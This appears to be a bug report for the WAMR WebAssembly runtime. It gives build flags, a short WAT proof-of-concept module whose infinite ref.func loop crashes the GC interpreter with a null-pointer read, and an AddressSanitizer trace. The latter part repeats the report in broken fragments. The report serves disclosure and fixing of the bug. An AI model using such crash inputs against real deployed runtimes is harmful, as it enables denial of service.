Describe the bug
The attached wasm module performs continuous gc allocation in an infinite loop. When running this module in the interpreter mode, a crash occurs.
Version
Version: 2.4.3
Commit: 4b306f0
To Reproduce
Steps to reproduce the behavior:
- Build
iwasm with the following features:
-DWAMR_BUILD_INTERP=1 -DWAMR_BUILD_AOT=0 -DWAMR_BUILD_JIT=0 -DWAMR_BUILD_FAST_JIT=0 -DWAMR_BUILD_FAST_INTERP=1 -DWAMR_BUILD_BULK_MEMORY=1 -DWAMR_BUILD_SIMD=1 -DWAMR_BUILD_REF_TYPES=1 -DWAMR_BUILD_EXTENDED_CONST_EXPR=1 -DWAMR_BUILD_MEMORY64=0 -DWAMR_BUILD_MULTI_MEMORY=0 -DWAMR_BUILD_TAIL_CALL=1 -DWAMR_BUILD_SHARED_MEMORY=1 -DWAMR_BUILD_GC=1 -DWAMR_BUILD_EXCE_HANDLING=0 -DWAMR_BUILD_LIB_PTHREAD=1 -DWAMR_BUILD_LIB_WASI_THREADS=1
- PoC - convert to wasm:
(module
(export "main" (func $main))
(func $main
block
loop
ref.func 0
br 0
end
end
)
)
- Run in classic/fast interpreter mode:
iwasm --interp -f main poc.wasm
Actual Result
AddressSanitizer:DEADLYSIGNAL
=================================================================
==385372==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x555555662a1f bp 0x7fffffff17b0 sp 0x7fffffff17b0 T0)
==385372==The signal is caused by a READ memory access.
==385372==Hint: address points to the zero page.
#0 0x555555662a1f in wasm_runtime_traverse_gc_rootset wasm-micro-runtime/core/iwasm/common/gc/gc_common.c:940
#1 0x55555572f9a5 in reclaim_instance_heap wasm-micro-runtime/core/shared/mem-alloc/ems/ems_gc.c:309
#2 0x55555572f9a5 in gci_gc_heap wasm-micro-runtime/core/shared/mem-alloc/ems/ems_gc.c:465
#3 0x55555572df7f in do_gc_heap wasm-micro-runtime/core/shared/mem-alloc/ems/ems_alloc.c:495
#4 0x55555572df7f in do_gc_heap wasm-micro-runtime/core/shared/mem-alloc/ems/ems_alloc.c:485
#5 0x55555572df7f in alloc_hmu_ex wasm-micro-runtime/core/shared/mem-alloc/ems/ems_alloc.c:538
#6 0x55555572e24c in gc_alloc_wo wasm-micro-runtime/core/shared/mem-alloc/ems/ems_alloc.c:784
#7 0x555555663e7f in gc_obj_malloc wasm-micro-runtime/core/iwasm/common/gc/gc_object.c:54
#8 0x555555663e7f in wasm_func_obj_new_internal wasm-micro-runtime/core/iwasm/common/gc/gc_object.c:392
#9 0x55555565940d in wasm_create_func_obj wasm-micro-runtime/core/iwasm/interpreter/wasm_runtime.c:2159
#10 0x55555569923e in wasm_interp_call_func_bytecode wasm-micro-runtime/core/iwasm/interpreter/wasm_interp_fast.c:2031
#11 0x5555556d9bc4 in wasm_interp_call_wasm wasm-micro-runtime/core/iwasm/interpreter/wasm_interp_fast.c:7990
#12 0x555555658250 in call_wasm_with_hw_bound_check wasm-micro-runtime/core/iwasm/interpreter/wasm_runtime.c:3638
#13 0x55555565a88b in wasm_call_function wasm-micro-runtime/core/iwasm/interpreter/wasm_runtime.c:3710
#14 0x55555564e3c5 in execute_func wasm-micro-runtime/core/iwasm/common/wasm_application.c:685
#15 0x55555564e3c5 in wasm_application_execute_func wasm-micro-runtime/core/iwasm/common/wasm_application.c:917
#16 0x555555577742 in app_instance_func wasm-micro-runtime/product-mini/platforms/linux/../posix/main.c:137
#17 0x555555577742 in main wasm-micro-runtime/product-mini/platforms/linux/../posix/main.c:1050
#18 0x7ffff7c29d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#19 0x7ffff7c29e3f in __libc_start_main_impl ../csu/libc-start.c:392
#20 0x555555579074 in _start (wasm-micro-runtime/product-mini/platforms/linux/build/iwasm-2.4.3+0x25074)
Desktop:
- Arch [x86_64]
- OS [Linux]
- Version [Ubuntu 22.04]
Describe the bug
The attached wasm module performs continuous gc allocation in an infinite loop. When running this module in the interpreter mode, a crash occurs.
Version
Version: 2.4.3
Commit: 4b306f0
To Reproduce
Steps to reproduce the behavior:
iwasmwith the following features:iwasm --interp -f main poc.wasmActual Result
Desktop: